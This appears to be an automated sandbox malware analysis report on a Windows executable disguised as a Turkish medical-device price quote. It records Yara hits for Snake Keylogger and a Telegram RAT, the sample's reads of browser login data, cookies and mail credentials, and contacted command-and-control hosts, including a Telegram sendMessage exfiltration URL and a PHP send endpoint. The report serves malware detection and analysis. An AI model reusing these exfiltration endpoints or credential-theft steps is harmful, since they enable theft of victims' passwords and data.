                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeQueries volume information: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Snake Keylogger
                    Source: Yara matchFile source: 00000006.00000002.3782735191.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 6.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3ec15b8.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3e7eb98.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3ec15b8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3e7eb98.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.3780343381.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1343434926.0000000003E7E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe PID: 7588, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe PID: 7844, type: MEMORYSTR
                    Yara detected VIP Keylogger
                    Source: Yara matchFile source: 6.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3ec15b8.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3e7eb98.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3ec15b8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3e7eb98.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.3780343381.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.3782735191.0000000002F8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1343434926.0000000003E7E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe PID: 7588, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe PID: 7844, type: MEMORYSTR
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Yara matchFile source: 6.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3ec15b8.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3e7eb98.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3ec15b8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3e7eb98.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.3780343381.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1343434926.0000000003E7E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe PID: 7588, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe PID: 7844, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected Snake Keylogger
                    Source: Yara matchFile source: 00000006.00000002.3782735191.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 6.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3ec15b8.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3e7eb98.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3ec15b8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3e7eb98.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.3780343381.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1343434926.0000000003E7E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe PID: 7588, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe PID: 7844, type: MEMORYSTR
                    Yara detected VIP Keylogger
                    Source: Yara matchFile source: 6.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3ec15b8.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3e7eb98.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3ec15b8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3e7eb98.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.3780343381.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.3782735191.0000000002F8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1343434926.0000000003E7E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe PID: 7588, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe PID: 7844, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Web Service                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts112
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		LSASS Memory13
                    System Information Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		3
                    Ingress Tool Transfer                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
                    Obfuscated Files or Information                    		Security Account Manager1
                    Query Registry                    		SMB/Windows Admin Shares1
                    Email Collection                    		11
                    Encrypted Channel                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                    Software Packing                    		NTDS1
                    Security Software Discovery                    		Distributed Component Object Model1
                    Clipboard Data                    		1
                    Non-Standard Port                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Timestomp                    		LSA Secrets2
                    Process Discovery                    		SSHKeylogging3
                    Non-Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading                    		Cached Domain Credentials31
                    Virtualization/Sandbox Evasion                    		VNCGUI Input Capture24
                    Application Layer Protocol                    		Data Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Masquerading                    		DCSync1
                    Application Window Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                    Virtualization/Sandbox Evasion                    		Proc Filesystem1
                    System Network Configuration Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt112
                    Process Injection                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1572259 Sample: fiyati_teklif 65TIBBI20_ DR... Startdate: 10/12/2024 Architecture: WINDOWS Score: 100 22 reallyfreegeoip.org 2->22 24 api.telegram.org 2->24 26 4 other IPs or domains 2->26 34 Found malware configuration 2->34 36 Malicious sample detected (through community Yara rule) 2->36 38 Multi AV Scanner detection for submitted file 2->38 44 9 other signatures 2->44 8 fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe 4 2->8         started        signatures3 40 Tries to detect the country of the analysis system (by using the IP) 22->40 42 Uses the Telegram API (likely for C&C communication) 24->42 process4 file5 20 fiyati_teklif 65TI... jpeg docx .exe.log, ASCII 8->20 dropped 46 Adds a directory exclusion to Windows Defender 8->46 48 Injects a PE file into a foreign processes 8->48 12 fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe 15 2 8->12         started        16 powershell.exe 23 8->16         started        signatures6 process7 dnsIp8 28 adendanismanlik.com.tr 77.245.159.14, 49830, 587 NIOBEBILISIMHIZMETLERITR Turkey 12->28 30 checkip.dyndns.com 132.226.247.73, 49704, 49734, 49750 UTMEMUS United States 12->30 32 2 other IPs or domains 12->32 50 Tries to steal Mail credentials (via file / registry access) 12->50 52 Tries to harvest and steal browser information (history, passwords, etc) 12->52 54 Loading BitLocker PowerShell Module 16->54 18 conhost.exe 16->18         started        signatures9 process10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe24%ReversingLabs
                    fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    No Antivirus matches

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    reallyfreegeoip.org
                    		172.67.177.134
                    		truefalse
                      		high
                      api.telegram.org
                      		149.154.167.220
                      		truefalse
                        		high
                        adendanismanlik.com.tr
                        		77.245.159.14
                        		truetrue
                          		unknown
                          checkip.dyndns.com
                          		132.226.247.73
                          		truefalse
                            		high
                            checkip.dyndns.org
                            		unknown
                            		unknownfalse
                              		high
                              mail.adendanismanlik.com.tr
                              		unknown
                              		unknowntrue
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                https://reallyfreegeoip.org/xml/8.46.123.175false
                                  		high
                                  http://checkip.dyndns.org/false
                                    		high
                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2011/12/2024%20/%2010:44:44%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                      		high

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://aborters.duckdns.org:8081fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.1343434926.0000000003E7E000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3780343381.0000000000402000.00000040.00000400.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3782735191.0000000002ED1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://ac.ecosia.org/autocomplete?q=fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3786383841.0000000003EF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.office.com/fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3782735191.0000000002F8F000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://duckduckgo.com/chrome_newtabfiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3786383841.0000000003EF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://duckduckgo.com/ac/?q=fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3786383841.0000000003EF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icofiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3786383841.0000000003EF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://51.38.247.67:8081/_send_.php?Lfiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3782735191.0000000002F8F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://api.telegram.org/botfiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.1343434926.0000000003E7E000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3782735191.0000000002F82000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3780343381.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://anotherarmy.dns.army:8081fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.1343434926.0000000003E7E000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3780343381.0000000000402000.00000040.00000400.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3782735191.0000000002ED1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
